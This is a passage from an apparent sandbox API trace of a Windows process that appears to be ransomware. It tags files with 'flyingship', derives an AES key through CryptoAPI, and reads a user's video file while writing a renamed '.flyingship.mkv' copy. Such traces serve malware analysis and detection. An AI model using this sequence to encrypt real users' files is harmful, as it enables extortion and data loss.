(Locale=0x400, dwCmpFlags=0x1, lpString1="\\Videos\\z58zBpaZzgTTH\\AGaY9D6lmIb.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0199.114] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Videos\\z58zBpaZzgTTH\\AGaY9D6lmIb.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0199.114] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ideos\\z58zBpaZzgTTH\\AGaY9D6lmIb.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0199.114] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="deos\\z58zBpaZzgTTH\\AGaY9D6lmIb.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0199.114] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="eos\\z58zBpaZzgTTH\\AGaY9D6lmIb.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0199.114] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="os\\z58zBpaZzgTTH\\AGaY9D6lmIb.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0199.114] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\z58zBpaZzgTTH\\AGaY9D6lmIb.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0199.114] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\z58zBpaZzgTTH\\AGaY9D6lmIb.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0199.114] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z58zBpaZzgTTH\\AGaY9D6lmIb.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0199.114] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="58zBpaZzgTTH\\AGaY9D6lmIb.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0199.114] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="8zBpaZzgTTH\\AGaY9D6lmIb.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0199.114] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="zBpaZzgTTH\\AGaY9D6lmIb.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0199.114] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BpaZzgTTH\\AGaY9D6lmIb.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0199.114] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="paZzgTTH\\AGaY9D6lmIb.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0199.114] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="aZzgTTH\\AGaY9D6lmIb.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0199.114] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ZzgTTH\\AGaY9D6lmIb.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0199.114] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="zgTTH\\AGaY9D6lmIb.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0199.114] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="gTTH\\AGaY9D6lmIb.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0199.114] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TTH\\AGaY9D6lmIb.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0199.114] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TH\\AGaY9D6lmIb.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0199.114] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="H\\AGaY9D6lmIb.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0199.114] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\AGaY9D6lmIb.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0199.114] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AGaY9D6lmIb.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0199.114] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GaY9D6lmIb.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0199.114] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="aY9D6lmIb.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0199.114] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Y9D6lmIb.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0199.114] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="9D6lmIb.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0199.114] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="D6lmIb.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0199.115] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="6lmIb.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0199.115] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0199.115] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0199.115] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="v", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0199.115] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="kv", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0199.115] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mkv", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0199.115] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mkv", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0199.115] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\AGaY9D6lmIb.mkv", lpFindFileData=0x87edb8 | out: lpFindFileData=0x87edb8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9978e910, ftCreationTime.dwHighDateTime=0x1d5e17c, ftLastAccessTime.dwLowDateTime=0x7fde61e0, ftLastAccessTime.dwHighDateTime=0x1d5df17, ftLastWriteTime.dwLowDateTime=0x7fde61e0, ftLastWriteTime.dwHighDateTime=0x1d5df17, nFileSizeHigh=0x0, nFileSizeLow=0x17682, dwReserved0=0x87ef08, dwReserved1=0x8a7560, cFileName="AGaY9D6lmIb.mkv", cAlternateFileName="AGAY9D~1.MKV")) returned 0x90ae18 [0199.115] FindClose (in: hFindFile=0x90ae18 | out: hFindFile=0x90ae18) returned 1 [0199.115] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0199.115] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0199.115] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74f20000 [0199.115] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0199.115] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0199.116] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0199.116] CryptAcquireContextA (in: phProv=0x87ea98, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x87ea98*=0x9c0c88) returned 1 [0199.117] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0199.117] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0199.117] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0199.117] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0199.117] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0199.117] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0199.117] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0199.117] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0199.117] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0199.117] CryptCreateHash (in: hProv=0x9c0c88, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x87e808 | out: phHash=0x87e808) returned 1 [0199.127] CharLowerBuffW (in: lpsz="byte[25]", cchLength=0x8 | out: lpsz="byte[25]") returned 0x8 [0199.127] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0199.127] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0199.127] CryptHashData (hHash=0x90af58, pbData=0x8dee70, dwDataLen=0x19, dwFlags=0x1) returned 1 [0199.127] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0199.127] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0199.127] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0199.127] CryptDeriveKey (in: hProv=0x9c0c88, Algid=0x660e, hBaseData=0x90af58, dwFlags=0x1, phKey=0x87e808 | out: phKey=0x87e808*=0x90aed8) returned 1 [0199.127] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0199.127] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0199.127] CryptDestroyHash (hHash=0x90af58) returned 1 [0199.127] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\AGaY9D6lmIb.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\z58zbpazzgtth\\agay9d6lmib.mkv"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0199.128] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0199.128] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef40 | out: lpNewFilePointer=0x0) returned 1 [0199.129] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded58 [0199.129] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0199.129] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2728 [0199.129] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0199.129] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0199.129] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0199.129] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df140 | out: hHeap=0x8a0000) returned 1 [0199.129] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0199.129] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0199.129] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0199.129] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0199.129] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2778 [0199.129] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0199.129] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0199.129] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0199.129] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af58 [0199.129] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0199.129] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af58 | out: hHeap=0x8a0000) returned 1 [0199.129] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0199.129] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0199.129] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df140 [0199.129] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0199.129] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0199.129] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0199.129] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0199.129] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0199.129] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0199.129] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27d8 [0199.129] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0199.130] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0199.130] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0199.130] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0199.130] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0199.130] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2778 [0199.130] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0199.130] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27d8 [0199.130] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0199.130] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0199.130] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0199.130] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0199.130] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0199.130] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26d8 [0199.130] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0199.130] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2838 [0199.130] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0199.130] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0199.130] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0199.130] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xa0) returned 0x8f9100 [0199.130] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0199.130] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x70) returned 0x906f38 [0199.130] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0199.130] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x70) returned 0x8fff18 [0199.130] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8f9100 | out: hHeap=0x8a0000) returned 1 [0199.130] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0199.130] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0199.130] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0199.130] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0199.130] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0199.130] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x906f38 | out: hHeap=0x8a0000) returned 1 [0199.131] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0199.131] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0199.131] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0199.131] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0199.131] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x70) returned 0x906f38 [0199.131] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\z58zbpazzgtth")) returned 0x10 [0199.131] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x906f38 | out: hHeap=0x8a0000) returned 1 [0199.131] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0199.131] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8fff18 | out: hHeap=0x8a0000) returned 1 [0199.131] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0199.131] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0199.131] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0199.131] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af58 [0199.131] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0xbda010 [0199.132] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0199.132] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2778 [0199.132] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\AGaY9D6lmIb.flyingship.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\z58zbpazzgtth\\agay9d6lmib.flyingship.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0199.133] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deb78 [0199.133] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0199.133] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27d8 [0199.133] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0199.133] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0199.133] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0199.133] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df140 | out: hHeap=0x8a0000) returned 1 [0199.133] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0199.133] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0199.133] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0199.133] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0199.133] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0199.133] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0199.133] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0199.133] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0199.133] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af98 [0199.133] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0199.133] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af98 | out: hHeap=0x8a0000) returned 1 [0199.133] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0199.133] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af98 [0199.133] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0199.133] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0199.133] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df140 [0199.133] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0199.133] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0199.133] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0199.133] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0199.133] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0199.133] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0199.134] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0199.134] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0199.134] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0199.134] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0199.134] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0199.134] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0199.134] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0199.134] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x100000) returned 0x2480020 [0199.134] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef90 | out: lpNewFilePointer=0x0) returned 1 [0199.134] ReadFile (in: hFile=0x160, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87efb8*=0x10000, lpOverlapped=0x0) returned 1 [0199.137] ReadFile (in: hFile=0x160, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87efb8*=0x7682, lpOverlapped=0x0) returned 1 [0199.138] ReadFile (in: hFile=0x160, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87efb8*=0x0, lpOverlapped=0x0) returned 1 [0199.138] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0199.138] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0199.138] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0199.138] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0199.138] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x17682) returned 0xbea018 [0199.139] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x2480020 | out: hHeap=0x8a0000) returned 1 [0199.140] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0199.140] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0199.140] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df140 | out: hHeap=0x8a0000) returned 1 [0199.140] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0199.140] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0199.140] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x17682) returned 0xa5f008 [0199.142] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbea018 | out: hHeap=0x8a0000) returned 1 [0199.142] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0199.142] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, 